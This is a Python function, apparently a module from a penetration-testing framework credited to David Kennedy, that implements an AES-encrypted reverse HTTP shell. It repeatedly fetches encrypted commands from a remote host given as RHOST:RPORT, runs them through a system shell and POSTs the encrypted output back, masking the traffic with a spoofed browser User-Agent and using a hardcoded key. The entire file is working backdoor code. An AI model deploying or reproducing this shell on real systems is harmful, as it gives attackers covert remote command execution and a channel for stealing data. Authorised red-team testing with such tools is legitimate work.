
def aeshttp():
    '''
    @description: Starts a reverse HTTP shell with AES encryption that will connect back to a remote host.
    @short: reverse AES HTTP shell
    @author: original code by David Kennedy aka ReL1k
    '''
    import httplib
    import urllib
    try:
        from Crypto.Cipher import AES
    except ImportError:
        print("[!] Python Crypto library is not installed. This module will not work without this!")
        sys.exit(2) 

    BLOCK_SIZE = 32
    PADDING = '{'
    pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
    EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
    DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)

    secret = "Fj39@vF4@54&8dE@!)(*^+-pL;'dK3J2"

    cipher = AES.new(secret)

    log_msg("\n\n [ Reverse AES HTTP shell executed ] ")
    log_msg("\n Start Time: %s" % logtime)

    while 1:

        req = urllib2.Request('http://%s:%s' % (RHOST,RPORT))
        message = urllib2.urlopen(req)
        message = base64.b64decode(message.read())
        message = DecodeAES(cipher, message)

        if message == "killme":
            sys.exit()

        if message.startswith("cd"):
            destination = message[3:].replace('\n','')
            if os.path.isdir(destination):
                os.chdir(destination)
            else:
                pass


        proc = subprocess.Popen(message, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)

        data = proc.stdout.read() + proc.stderr.read()
        data = EncodeAES(cipher, data)
        data = base64.b64encode(data)
        data = urllib.urlencode({'cmd': '%s'}) % (data)
        h = httplib.HTTPConnection('%s:%s' % (RHOST,RPORT))
        headers = {"User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)","Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
        h.request('POST', '/index.aspx', data, headers)


